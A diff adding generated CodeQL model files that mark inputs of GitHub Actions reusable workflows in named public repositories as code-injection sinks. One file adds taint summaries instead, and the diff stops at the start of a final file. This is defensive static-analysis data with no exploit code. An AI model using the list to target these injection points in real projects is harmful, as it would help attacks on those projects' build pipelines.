@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.context", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.tags", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.image-name", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.image-uuid", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.staging-repo", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.staging", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml new file mode 100644 index 000000000000..6c9f45dbad01 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.test", "code-injection", "generated"] + - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml new file mode 100644 index 000000000000..40856fa46b38 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image-aio", "code-injection", "generated"] + - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml new file mode 100644 index 000000000000..807229fc6b5e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.amazonflag", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.magiskver", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.root", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.gapps", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.arch", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.amazonflag", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.magiskver", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.root", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.gapps", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml new file mode 100644 index 000000000000..df2220211b94 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "input.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml new file mode 100644 index 000000000000..7faea6b07ef1 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "input.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml new file mode 100644 index 000000000000..43018d43110d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.target_platform", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.fprime_location", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "input.default_target_ref", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "input.target_repository", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml new file mode 100644 index 000000000000..eaf9a48f30fb --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "input.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml new file mode 100644 index 000000000000..b50566bcad6a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.with_default", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.string_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.number_optional", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.number_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.bool_optional", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.bool_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.string_optional", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml new file mode 100644 index 000000000000..8bd7e837d38a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image-tag", "taint", "manual"] + - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image", "taint", "manual"] 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml new file mode 100644 index 000000000000..7b76f842451e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "input.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml new file mode 100644 index 000000000000..ee4636c6a2d7 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.custom_run_id", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.non_validator_mode", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.additional_optimism_options", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.network", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.additional_options", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.cl_client", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml new file mode 100644 index 000000000000..5f1f9ea13ad3 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "input.agent_version", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/post_deploy_agent.yml", "*", "input.test_mode", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/multiverse_run.yml", "*", "input.agentVersion", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "input.dry-run", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "input.prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml new file mode 100644 index 000000000000..d2188efb8ee6 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "input.page", "code-injection", "generated"] + - ["newrelic/newrelic-java-agent/.github/workflows/GHA-Unit-Tests.yaml", "*", "input.agent-ref", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml new file mode 100644 index 000000000000..ed86bf9266bb --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.changelog_file", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.workflows", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "input.changelog_file", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "input.release_type", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml new file mode 100644 index 000000000000..79a253fe25e7 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.PupNetVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "input.PupNetVersion", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml new file mode 100644 index 000000000000..f78830a9f9a7 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.dry_run", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "input.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "input.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "input.dry_run", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "input.short_target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.short_target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.dry_run", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml new file mode 100644 index 000000000000..789cdc003be6 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.shard", "code-injection", "generated"] + - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.db", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml new file mode 100644 index 000000000000..a2d7f77b2531 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml 
@@ -0,0 +1,20 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.docker_image", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.terraform_workspace", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_environment", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_sentry_dsn", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_webhook_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_ws_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_api_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_hubspot_embed", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_mail_server_domain", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_environment", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_sentry_dsn", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_widget_embed_path", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_webhook_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_ws_url", "code-injection", "generated"] + - 
["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_api_url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml new file mode 100644 index 000000000000..c3d0b1d87514 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml new file mode 100644 index 000000000000..35aeca022bc0 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.npmVersion", "code-injection", "generated"] + - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.nodeVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml new file mode 100644 index 000000000000..419d80970fab --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml new file mode 100644 index 000000000000..07841ba0a180 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml new file mode 100644 index 000000000000..2501e39f850a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/ini/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml new file mode 100644 index 000000000000..2a1fd972192a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml new file mode 100644 index 000000000000..46568f16fa6a 
--- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml new file mode 100644 index 000000000000..0bba5671572e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml new file mode 100644 index 000000000000..37bd78f271d4 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml new file mode 100644 index 000000000000..ebc6dfe01d21 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/node-which/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml new file mode 100644 index 000000000000..ab3c341b895e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/nopt/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml new file mode 100644 index 000000000000..78f8e605665f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml new file mode 100644 index 000000000000..d4d377730af0 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml new file mode 100644 index 000000000000..d8cb45c66a74 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.base-branch", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.repo", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.current-branch", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.chain", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml new file mode 100644 index 000000000000..2fc426809c24 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/windows-build-clang.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/macos-build.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/macos-build-arm.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/linux-build-gcc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/linux-build-clang.yaml", "*", "input.cmakePreset", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml new file mode 100644 index 000000000000..eee7b011b0c2 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml new file mode 100644 index 000000000000..4dbaa756bc7d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "input.project-name", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml new file mode 100644 index 000000000000..f78ded292a5c --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-build-commands", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml new file mode 100644 index 000000000000..a0df95b6c756 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml 
